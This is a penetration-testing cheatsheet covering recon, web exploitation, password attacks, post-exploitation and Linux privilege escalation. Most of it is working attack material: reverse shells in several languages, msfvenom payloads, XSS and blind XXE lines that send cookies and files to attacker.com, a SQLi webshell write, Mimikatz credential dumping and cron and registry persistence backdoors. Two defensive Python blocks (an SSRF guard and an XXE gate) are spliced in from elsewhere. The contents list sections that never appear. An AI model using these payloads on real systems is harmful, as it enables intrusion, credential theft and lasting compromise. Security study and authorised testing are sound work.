Disclaimer: This cheatsheet is for authorised penetration testing and educational purposes only. Never use these techniques against systems you do not own or have explicit written permission to test.
Table of Contents
- OSINT & Recon
- Google Dorks
- Scanning & Enumeration
- Web Exploitation
- Network Exploitation
- Password Attacks
- Post Exploitation
- Privilege Escalation — Linux
- Privilege Escalation — Windows
- Active Directory
- Pivoting & Tunnelling
OSINT & Recon
Passive DNS & Domain Recon
# WHOIS lookup — registrar, registration dates, contact info
whois target.com
# DNS enumeration — A, MX, NS, TXT records
dig target.com ANY
dig target.com MX
dig target.com TXT
# Reverse DNS lookup
dig -x 192.168.1.1
# Zone transfer attempt (often fails but always worth trying)
dig axfr @ns1.target.com target.com
# DNSrecon — comprehensive DNS enumeration
dnsrecon -d target.com -t std
dnsrecon -d target.com -t axfr # zone transfer
dnsrecon -d target.com -t brt -D /usr/share/wordlists/dnsmap.txt # brute force
Subdomain Enumeration
# Sublist3r — passive subdomain enumeration via OSINT sources
sublist3r -d target.com
sublist3r -d target.com -o subdomains.txt
# Amass — thorough subdomain discovery
amass enum -d target.com
amass enum -active -d target.com -o amass_out.txt
# assetfinder — fast passive recon
assetfinder --subs-only target.com
# crt.sh — certificate transparency logs (browser or curl)
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq '.[].name_value' | sort -u
# Subfinder
subfinder -d target.com -o subfinder_out.txt
# Brute force subdomains with ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://FUZZ.target.com -mc 200,301,302
Email & Employee Recon
# theHarvester — emails, subdomains, hosts from public sources
theHarvester -d target.com -b all
theHarvester -d target.com -b google,linkedin,shodan
# Hunter.io (browser) — email format discovery
# https://hunter.io/search/target.com
# LinkedIn recon via Google
# site:linkedin.com "target company" "engineer"
Shodan & Censys
# Shodan CLI
shodan search 'org:"Target Company"'
shodan search 'hostname:target.com'
shodan search 'ssl.cert.subject.cn:target.com'
shodan host 192.168.1.1 # detailed host info
# Common Shodan filters
# port:22 org:"Target"
# product:"Apache httpd" country:"GB"
# http.title:"Dashboard" org:"Target"
Wayback Machine & Historical Recon
# gau — fetch all known URLs for a domain
gau target.com
gau target.com | grep "\.js$" # JavaScript files
gau target.com | grep "\.php$" # PHP endpoints
# waybackurls
waybackurls target.com | tee wayback.txt
# Check robots.txt and sitemap
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml
Google Dorks
# Find login portals
site:target.com inurl:login
site:target.com inurl:admin
site:target.com intitle:"Login"
# Exposed files
site:target.com ext:pdf
site:target.com ext:xls OR ext:xlsx
site:target.com ext:sql
site:target.com ext:log
site:target.com ext:bak OR ext:backup
site:target.com ext:env
site:target.com ext:config
# Directory listings
site:target.com intitle:"index of"
site:target.com intitle:"index of /" "parent directory"
# Sensitive info exposure
site:target.com "password" filetype:log
site:target.com "DB_PASSWORD" ext:env
site:target.com intext:"api_key" OR intext:"api key"
# Config and source files
site:target.com ext:xml intext:"password"
site:target.com filetype:conf
site:target.com filetype:ini
# GitHub/Pastebin leaks
site:github.com "target.com" password
site:pastebin.com "target.com"
# Error messages (reveals tech stack)
site:target.com "SQL syntax"
site:target.com "Warning: mysql_"
site:target.com "Uncaught exception"
# Webcams / open devices
inurl:/view/index.shtml # Axis cameras
intitle:"webcamXP 5"
intitle:"D-Link" inurl:8080
# Juicy combos
intitle:"admin panel" site:target.com
inurl:"phpinfo.php" site:target.com
inurl:"/wp-admin/" site:target.com
Scanning & Enumeration
Nmap
# Quick scan — top 1000 ports
nmap -sV -sC 10.10.10.1
# Full port scan
nmap -p- 10.10.10.1
# Stealth scan with OS detection — good all-rounder
nmap -sS -sV -O -Pn 10.10.10.1
# Aggressive scan (noisy but thorough)
nmap -A 10.10.10.1
# UDP scan (slow but reveals SNMP, DNS, etc.)
nmap -sU --top-ports 100 10.10.10.1
# Scan a subnet
nmap -sn 10.10.10.0/24 # ping sweep
nmap -sV 10.10.10.0/24
# Output to all formats
nmap -sV -oA scan_results 10.10.10.1
# Script scan — run default scripts
nmap -sC 10.10.10.1
# Run a specific script
nmap --script=http-enum 10.10.10.1
nmap --script=smb-vuln* 10.10.10.1
nmap --script=ftp-anon 10.10.10.1
# Firewall evasion
nmap -f 10.10.10.1 # fragment packets
nmap -D RND:10 10.10.10.1 # decoy scan
nmap --source-port 53 10.10.10.1 # spoof source port
Service-Specific Enumeration
FTP (21)
# Anonymous login attempt
ftp 10.10.10.1
# Username: anonymous, Password: (blank or email)
# Nmap script
nmap --script=ftp-anon,ftp-bounce,ftp-syst 10.10.10.1
# Brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.1
SSH (22)
# Banner grab
nc -v 10.10.10.1 22
# Enumerate supported auth methods
ssh -v user@10.10.10.1
# Brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1
hydra -L users.txt -P passwords.txt ssh://10.10.10.1
# SSH with key
ssh -i id_rsa user@10.10.10.1
SMTP (25)
# Connect and enumerate users (VRFY/EXPN)
nc -v 10.10.10.1 25
VRFY root
EXPN admin
# smtp-user-enum
smtp-user-enum -M VRFY -U users.txt -t 10.10.10.1
DNS (53)
# Zone transfer
dig axfr @10.10.10.1 target.com
# Reverse lookup
dig -x 10.10.10.1 @10.10.10.1
# Brute force subdomains
dnsenum --dnsserver 10.10.10.1 --enum target.com
SMB (139/445)
# Enumerate shares (null session)
smbclient -L //10.10.10.1 -N
smbmap -H 10.10.10.1
# Connect to a share
smbclient //10.10.10.1/share -N
smbclient //10.10.10.1/share -U username
# Enum4linux — full SMB enumeration
enum4linux -a 10.10.10.1
enum4linux-ng -A 10.10.10.1
# Nmap SMB scripts
nmap --script=smb-enum-shares,smb-enum-users 10.10.10.1
nmap --script=smb-vuln* 10.10.10.1 # check for EternalBlue etc.
# CrackMapExec
crackmapexec smb 10.10.10.1
crackmapexec smb 10.10.10.1 -u user -p password --shares
SNMP (161 UDP)
# Walk MIB with default community string
snmpwalk -v2c -c public 10.10.10.1
snmpwalk -v1 -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # hostname
# Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.10.10.1
# snmp-check — friendlier output
snmp-check 10.10.10.1 -c public
LDAP (389)
# Anonymous bind enumeration
ldapsearch -x -H ldap://10.10.10.1 -b "dc=target,dc=com"
ldapsearch -x -H ldap://10.10.10.1 -b "dc=target,dc=com" "(objectClass=*)"
# Authenticated
ldapsearch -x -H ldap://10.10.10.1 -D "cn=admin,dc=target,dc=com" \
-w password -b "dc=target,dc=com"
Web Enumeration
# Directory brute force — ffuf
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://10.10.10.1/FUZZ -mc 200,301,302,403
# gobuster
gobuster dir -u http://10.10.10.1 \
-w /usr/share/seclists/Discovery/Web-Content/common.txt
# feroxbuster — recursive
feroxbuster -u http://10.10.10.1 -w /usr/share/wordlists/dirb/common.txt
# Virtual host enumeration
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-H "Host: FUZZ.target.com" -u http://10.10.10.1 -mc 200,301
# Technology fingerprinting
whatweb http://10.10.10.1
# Wappalyzer (browser extension)
# Nikto — web vulnerability scanner
nikto -h http://10.10.10.1
# Parameter fuzzing — find hidden GET parameters
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u http://10.10.10.1/page?FUZZ=test -mc 200 -fs <baseline_size>
# Fuzz parameter values
ffuf -w /usr/share/wordlists/rockyou.txt \
-u "http://10.10.10.1/page?id=FUZZ" -mc 200 -fs <baseline_size>
# POST parameter fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u http://10.10.10.1/login -X POST -d "FUZZ=test" \
-H "Content-Type: application/x-www-form-urlencoded" -mc 200
# Extension fuzzing — find backup/alternate files
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt \
-u http://10.10.10.1/indexFUZZ -mc 200
# Fuzz with cookies (authenticated)
ffuf -w wordlist.txt -u http://10.10.10.1/FUZZ \
-H "Cookie: session=abc123" -mc 200,301,302
Web Exploitation
SQL Injection
# Manual detection
' OR 1=1-- -
' OR '1'='1
" OR "1"="1
') OR ('1'='1
# sqlmap — automated SQLi
sqlmap -u "http://target.com/page?id=1"
sqlmap -u "http://target.com/page?id=1" --dbs # list databases
sqlmap -u "http://target.com/page?id=1" -D dbname --tables # list tables
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
# sqlmap with POST request
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# sqlmap with cookies
sqlmap -u "http://target.com/page" --cookie="session=abc123"
# sqlmap with Burp request file
sqlmap -r request.txt
# Boolean-based blind
' AND 1=1-- - # true
' AND 1=2-- - # false
# UNION-based — find column count
' ORDER BY 1-- -
' ORDER BY 2-- - # increment until error
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 1,2,3-- -
# MySQL — read files
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL-- -
# MySQL — write webshell
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
Cross-Site Scripting (XSS)
# Basic reflected XSS
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# Cookie stealing payload
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
# Filter bypass
<ScRiPt>alert(1)</ScRiPt>
<script>alert`1`</script>
<iframe src="javascript:alert(1)">
"><script>alert(1)</script>
'><script>alert(1)</script>
# Stored XSS — test in all input fields, comments, profiles
# DOM-based — check URL parameters reflected in JS
File Inclusion
# Local File Inclusion (LFI)
?page=../../../../etc/passwd
?file=....//....//....//etc/passwd # bypass ../ filter
?lang=php://filter/convert.base64-encode/resource=index.php # read PHP source
# LFI → RCE via log poisoning
# 1. Inject PHP into User-Agent header:
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# 2. Include the log file:
?page=/var/log/apache2/access.log&cmd=id
# LFI → RCE via /proc/self/environ
?page=/proc/self/environ&cmd=id
# Remote File Inclusion (RFI)
?page=http://attacker.com/shell.php
# PHP wrappers
?page=php://input # POST PHP code in body
?page=data://text/plain,<?php system('id'); ?>
?page=expect://id
Command Injection
# Basic injection characters
; id
| id
|| id
&& id
`id`
$(id)
# Bypass spaces
{id}
$IFS # Internal Field Separator
cat${IFS}/etc/passwd
cat</etc/passwd
# Bypass blacklists
w'h'o'am'i
w"h"o"am"i
/bin/c?t /etc/passwd # wildcard
$(printf "\x77\x68\x6f\x61\x6d\x69") # hex encoding
SSRF
SSRF (Server-Side Request Forgery) tricks the server into making HTTP requests on your behalf. Look for parameters that accept URLs or hostnames — url=, redirect=, fetch=, src=, path= etc. The goal is to reach internal services the server can talk to but you can’t directly.
# Point the server at itself — access internal-only services
url=http://localhost/admin
url=http://127.0.0.1:22 # probe internal ports (different response = port open)
url=http://127.0.0.1:3306 # MySQL
url=http://127.0.0.1:6379 # Redis — often unauthenticated internally
# Cloud metadata endpoints — high value target on AWS/GCP/Azure
url=http://169.254.169.254/latest/meta-data/ # AWS
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ # AWS IAM keys
url=http://metadata.google.internal/computeMetadata/v1/ # GCP
url=http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Azure
# Filter bypass — servers often blacklist "127.0.0.1" or "localhost" as strings
url=http://2130706433/ # 127.0.0.1 as decimal integer
url=http://0x7f000001/ # 127.0.0.1 as hex
url=http://127.1/ # shorthand notation
url=http://[::1]/ # IPv6 loopback
url=http://localtest.me/ # DNS resolves to 127.0.0.1
# Internal network pivoting — scan private ranges via the server
url=http://192.168.1.1/ # probe internal hosts
url=http://10.0.0.1:8080/admin # reach internal admin panels
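A defender-side guard for the bypasses listed above, added here as an example (it is not part of the cheatsheet): it canonicalises the alternative IPv4 spellings (decimal, hex, shorthand, IPv4-mapped IPv6), resolves hostnames, and refuses any destination that is not globally routable, so a string blocklist of "127.0.0.1"/"localhost" is never what the check relies on. The stub DNS table and its answers are constructed so the block runs offline; `stub_resolver` is only for demonstration.

```python
"""Outbound-URL guard against SSRF. Standard library only."""
import ipaddress
import socket
from typing import Callable, Iterable, Optional, Union
from urllib.parse import urlsplit

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Resolver = Callable[[str], Iterable[str]]
ALLOWED_SCHEMES = {"http", "https"}


def _atoi(part: str) -> int:
    """One inet_aton-style component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if part.lower().startswith("0x"):
        return int(part, 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def legacy_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Parse the forms libc inet_aton accepts but ipaddress rejects:
    '2130706433', '0x7f000001', '127.1', '0177.0.0.1'. None if not such a form."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isascii() and p.isalnum() for p in parts):
        return None
    try:
        nums = [_atoi(p) for p in parts]
    except ValueError:
        return None
    value = 0
    for n in nums[:-1]:  # leading components are single octets
        if n > 0xFF:
            return None
        value = (value << 8) | n
    tail_bits = 8 * (5 - len(parts))  # the last component fills the remaining bytes
    if nums[-1] >= 1 << tail_bits:
        return None
    return ipaddress.IPv4Address((value << tail_bits) | nums[-1])


def parse_ip_literal(host: str) -> Optional[IPAddress]:
    try:
        return ipaddress.ip_address(host)  # standard dotted quad or IPv6
    except ValueError:
        return legacy_ipv4(host)


def system_resolver(host: str) -> Iterable[str]:
    """Real DNS lookup; strips IPv6 scope ids such as %eth0."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}


# Constructed answers so the example runs offline (hypothetical data).
STUB_DNS = {
    "localtest.me": ["127.0.0.1"],
    "metadata.google.internal": ["169.254.169.254"],
    "example.com": ["93.184.216.34", "2606:2800:21f:cb07:6820:80da:af6b:8b2c"],
}


def stub_resolver(host: str) -> Iterable[str]:
    if host not in STUB_DNS:
        raise socket.gaierror(f"no stub answer for {host}")
    return STUB_DNS[host]


def is_safe_target(url: str, resolver: Resolver = system_resolver) -> bool:
    """True only if the scheme is allowed and every address the host maps to is global."""
    parts = urlsplit(url)
    host = parts.hostname  # brackets stripped, lower-cased
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host:
        return False
    literal = parse_ip_literal(host)
    try:
        addrs = [literal] if literal is not None else [ipaddress.ip_address(a) for a in resolver(host)]
    except (socket.gaierror, ValueError):
        return False
    for addr in addrs:
        mapped = getattr(addr, "ipv4_mapped", None)  # ::ffff:127.0.0.1 -> 127.0.0.1
        if mapped is not None:
            addr = mapped
        if not addr.is_global:  # loopback, RFC1918, link-local (169.254/16), reserved
            return False
    return True
```

Resolve once and connect to the vetted address (and re-run the check inside any redirect handler); a name under DNS rebinding can answer differently at connect time.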
XXE
XXE (XML External Entity Injection) exploits XML parsers that process external entity declarations. When an app accepts XML input — SOAP requests, file uploads, API payloads — and the parser has external entities enabled, you can use it to read local files, probe internal services, or exfiltrate data out-of-band. Look for Content-Type: application/xml or text/xml in requests, and any file upload that accepts XML, SVG, DOCX, or XLSX formats.
<!-- Basic XXE — read a local file. The contents of /etc/passwd are returned
in the response wherever &xxe; is rendered. -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- SSRF via XXE — make the server reach an internal endpoint -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>
<!-- Blind XXE via Out-of-Band (OOB) — when nothing is reflected in the response.
The server fetches your malicious DTD, which instructs it to exfiltrate
file contents to your listener as a DNS/HTTP request. -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&exfil;</root>
<!-- evil.dtd hosted on attacker server: -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfiltrate "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%exfiltrate;
<!-- XXE via file upload — rename a crafted SVG and upload it -->
<?xml version="1.0"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg>&xxe;</svg>
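The parser-side mitigation for the payloads above, added here as an example (not part of the cheatsheet): an expat pass whose handlers abort on any DOCTYPE, entity declaration or external entity reference, so the file-read, SSRF, blind parameter-entity and SVG variants are all rejected before the document reaches the normal parser. Only the standard library is used; the sample documents are the page's payloads plus a constructed benign one.

```python
"""Pre-parse gate for untrusted XML."""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class XXEBlocked(ValueError):
    """Raised when a document tries to use DTD features."""


def parse_untrusted_xml(data: bytes, forbid_dtd: bool = True) -> ET.Element:
    """Reject DTD/entity constructs, then parse with ElementTree.

    forbid_dtd=True refuses any DOCTYPE outright (the safest default). With
    forbid_dtd=False an internal-only DOCTYPE is tolerated, but an external
    subset, any entity declaration and any external reference still abort."""
    p = expat.ParserCreate()

    def start_doctype(name, sysid, pubid, has_internal_subset):
        if forbid_dtd or sysid or pubid:  # external DTD subset is never allowed
            raise XXEBlocked(f"DOCTYPE not allowed: {name}")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        raise XXEBlocked(f"{kind} entity declaration not allowed: {name}")

    def unparsed_entity_decl(name, base, sysid, pubid, notation):
        raise XXEBlocked(f"unparsed entity not allowed: {name}")

    def external_entity_ref(context, base, sysid, pubid):
        raise XXEBlocked(f"external entity reference not allowed: {sysid}")

    p.StartDoctypeDeclHandler = start_doctype
    p.EntityDeclHandler = entity_decl
    p.UnparsedEntityDeclHandler = unparsed_entity_decl
    p.ExternalEntityRefHandler = external_entity_ref
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)  # never fetch %dtd;
    p.Parse(data, True)  # raises XXEBlocked, or ExpatError if malformed
    return ET.fromstring(data)  # safe to hand to the regular parser now


def is_blocked(data: bytes, forbid_dtd: bool = True) -> bool:
    try:
        parse_untrusted_xml(data, forbid_dtd)
    except XXEBlocked:
        return True
    return False


# Test inputs: the cheatsheet's payloads and one constructed benign document.
FILE_READ = b"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""
BLIND_OOB = b"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&exfil;</root>"""
SVG_UPLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg>&xxe;</svg>"""
BENIGN = b"<order><item sku='A1'>2</item></order>"
```

Apply the same gate to every XML-bearing upload (SVG, DOCX and XLSX parts are XML inside a zip) and to SOAP bodies, not just endpoints that advertise application/xml.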
Network Exploitation
Metasploit
# Start Metasploit
msfconsole
# Search for exploits
search type:exploit platform:windows smb
search type:exploit platform:linux http
# Use a module
use exploit/path/to/module
show options
set RHOSTS 10.10.10.1
set LHOST 10.10.14.5
set LPORT 4444
run
# Common payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Generate shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f powershell
Reverse Shells
# Netcat listener
nc -lvnp 4444
# Bash reverse shell
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PHP reverse shell
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# PowerShell reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Netcat reverse shell
nc -e /bin/sh 10.10.14.5 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f
# Upgrade shell to fully interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z → stty raw -echo; fg → reset → export TERM=xterm
Responder — LLMNR/NBT-NS Poisoning
# Start Responder on interface
responder -I eth0 -rdwv
# Captures NTLMv2 hashes — crack with hashcat
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
Meterpreter
Once you have a Meterpreter shell via Metasploit, these are the commands you’ll reach for most:
# Core navigation
sysinfo # OS, hostname, architecture
getuid # current user
getpid # current process ID
ps # list running processes
shell # drop into a system shell
# File operations
upload /local/file.exe C:\\Windows\\Temp\\file.exe
download C:\\Users\\user\\Desktop\\flag.txt /tmp/
ls
cd C:\\Users
cat file.txt
# Privilege escalation
getsystem # attempt automatic privesc (token impersonation)
getuid # confirm if now SYSTEM
# Pivoting
run autoroute -s 192.168.1.0/24 # add route to internal subnet
portfwd add -l 8080 -p 80 -r 192.168.1.10 # forward remote port locally
# Post-exploitation modules
run post/windows/gather/hashdump # dump local hashes
run post/multi/recon/local_exploit_suggester # suggest local privesc exploits
run post/windows/manage/migrate # migrate to another process
# Persistence
run post/windows/manage/persistence_exe STARTUP=SCHEDULER
# Background / session management (from msfconsole)
background # background current session
sessions -l # list all sessions
sessions -i 1 # interact with session 1
Password Attacks
Wordlist Generation
# CeWL — custom wordlist from target website
cewl http://target.com -d 3 -m 5 -w wordlist.txt
# Crunch — generate by pattern
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
crunch 6 6 -t @@@@%% -o wordlist.txt # 4 letters + 2 digits
# Mentalist / CUPP — targeted personal wordlists
cupp -i # interactive mode, builds wordlist from personal info
Online Brute Force
# Hydra — versatile online brute forcer
hydra -l admin -P rockyou.txt 10.10.10.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
hydra -l root -P rockyou.txt ssh://10.10.10.1
hydra -L users.txt -P rockyou.txt ftp://10.10.10.1
hydra -l admin -P rockyou.txt 10.10.10.1 smb
# Medusa
medusa -h 10.10.10.1 -u admin -P rockyou.txt -M http -m DIR:/admin
# Burp Suite Intruder — for web login forms with CSRF tokens
Offline Hash Cracking
# Hashcat
hashcat -m 0 hashes.txt rockyou.txt # MD5
hashcat -m 100 hashes.txt rockyou.txt # SHA1
hashcat -m 1800 hashes.txt rockyou.txt # sha512crypt (Linux /etc/shadow)
hashcat -m 1000 hashes.txt rockyou.txt # NTLM
hashcat -m 5600 hashes.txt rockyou.txt # NTLMv2
hashcat -m 13100 hashes.txt rockyou.txt # Kerberoast (TGS)
hashcat -m 18200 hashes.txt rockyou.txt # AS-REP Roasting
# Rules-based cracking
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# John the Ripper
john hashes.txt --wordlist=rockyou.txt
john hashes.txt --wordlist=rockyou.txt --rules
john --format=NT hashes.txt --wordlist=rockyou.txt
# Extract hashes from files
pdf2john file.pdf > hash.txt
zip2john file.zip > hash.txt
ssh2john id_rsa > hash.txt
keepass2john vault.kdbx > hash.txt
Hash Identification
# hashid
hashid 'hash_here'
# haiti
haiti 'hash_here'
# Common hash lengths
# 32 chars → MD5
# 40 chars → SHA1
# 64 chars → SHA256
# $1$ → MD5crypt
# $2a$/$2b$ → bcrypt
# $6$ → sha512crypt
Post Exploitation
Situational Awareness
# Linux — who are we, where are we
id && whoami
hostname
uname -a
cat /etc/os-release
cat /proc/version
env
pwd
ip a
netstat -tulpn
ss -tulpn
ps aux
cat /etc/passwd
cat /etc/hosts
cat /etc/crontab
ls -la /home/
# Windows — situational awareness
whoami
whoami /priv
whoami /groups
hostname
systeminfo
net user
net localgroup administrators
ipconfig /all
netstat -ano
tasklist
wmic product get name,version # installed software
File Transfer
# Python HTTP server (attacker)
python3 -m http.server 80
# Download on Linux target
wget http://10.10.14.5/file.sh
curl http://10.10.14.5/file.sh -o file.sh
# Download on Windows target
certutil -urlcache -split -f http://10.10.14.5/file.exe file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','file.exe')"
iwr http://10.10.14.5/file.exe -OutFile file.exe # Invoke-WebRequest
# SCP
scp file.txt user@10.10.10.1:/tmp/
scp user@10.10.10.1:/etc/passwd ./passwd
# SMB server (attacker, impacket)
python3 /usr/share/impacket/examples/smbserver.py share . -smb2support
# On Windows target — copy from SMB share
copy \\10.10.14.5\share\file.exe .
Credential Hunting
# Linux — find stored credentials
find / -name "*.conf" 2>/dev/null | xargs grep -l "password"
find / -name "*.env" 2>/dev/null
find / -name "id_rsa" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null
cat ~/.bash_history
cat ~/.ssh/config
grep -r "password" /var/www/ 2>/dev/null
grep -r "DB_PASS" /var/www/ 2>/dev/null
# Windows — credential hunting
dir /s /b *pass* *cred* *vnc* *.config* 2>nul
findstr /si "password" *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # autologon creds
# Dump Windows credentials
# Mimikatz (on target)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # dump plaintext passwords from LSASS
lsadump::sam # dump SAM database
lsadump::secrets
# secretsdump (remote, impacket)
python3 secretsdump.py domain/user:password@10.10.10.1
Database Access
Once you have credentials or a shell, databases are a goldmine for credentials, flags, and pivoting material.
# MySQL
mysql -u root -p # interactive login
mysql -u root -p'password' -e "show databases;" # one-liner
mysql -u root -p -h 10.10.10.1 # remote connection
# MySQL useful commands
show databases;
use dbname;
show tables;
select * from users;
select user,password from mysql.user; # dump MySQL user hashes
select load_file('/etc/passwd'); # read files (if FILE priv)
# MSSQL (via impacket)
python3 mssqlclient.py domain/user:password@10.10.10.1 -windows-auth
python3 mssqlclient.py user:password@10.10.10.1
# MSSQL useful commands
SELECT name FROM master.dbo.sysdatabases; # list databases
USE dbname; SELECT * FROM INFORMATION_SCHEMA.TABLES;
EXEC xp_cmdshell 'whoami'; # RCE if enabled
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; # enable xp_cmdshell
# PostgreSQL
psql -U postgres -h 10.10.10.1
psql -U postgres -h 10.10.10.1 -c "\list" # list databases
# PostgreSQL useful commands
\list # list databases
\c dbname # connect to database
\dt # list tables
SELECT * FROM users;
COPY (SELECT '') TO PROGRAM 'id'; # RCE via COPY TO PROGRAM
Cracking /etc/shadow
# If you can read /etc/shadow — combine with /etc/passwd and crack offline
unshadow /etc/passwd /etc/shadow > hashes.txt
# Crack with John
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Crack with hashcat — identify mode first
hashid '$6$salt$hash...' # $6$ = sha512crypt, mode 1800
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt # $1$ md5crypt
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt # $2b$ bcrypt
Persistence
# Linux — cron job backdoor
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'" >> /etc/crontab
# Linux — SSH key persistence
mkdir ~/.ssh && echo "ssh-rsa AAAA...yourkey..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Windows — registry run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\backdoor.exe"
# Windows — scheduled task
schtasks /create /tn "backdoor" /tr "C:\backdoor.exe" /sc onlogon /ru System
Privilege Escalation — Linux
Automated Enumeration
# LinPEAS — comprehensive Linux privesc enumeration
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
# Linux Exploit Suggester
./linux-exploit-suggester.sh
# linux-smart-enumeration
./lse.sh -l 2 # level 2 — thorough
SUID / SGID Binaries
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Check GTFOBins for exploitation — https://gtfobins.github.io
# Common exploitable SUID binaries:
# /usr/bin/find → find . -exec /bin/sh \; -quit
# /usr/bin/vim → vim -c ':py import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'
# /usr/bin/nmap → nmap --interactive → !sh
# /bin/bash → bash -p
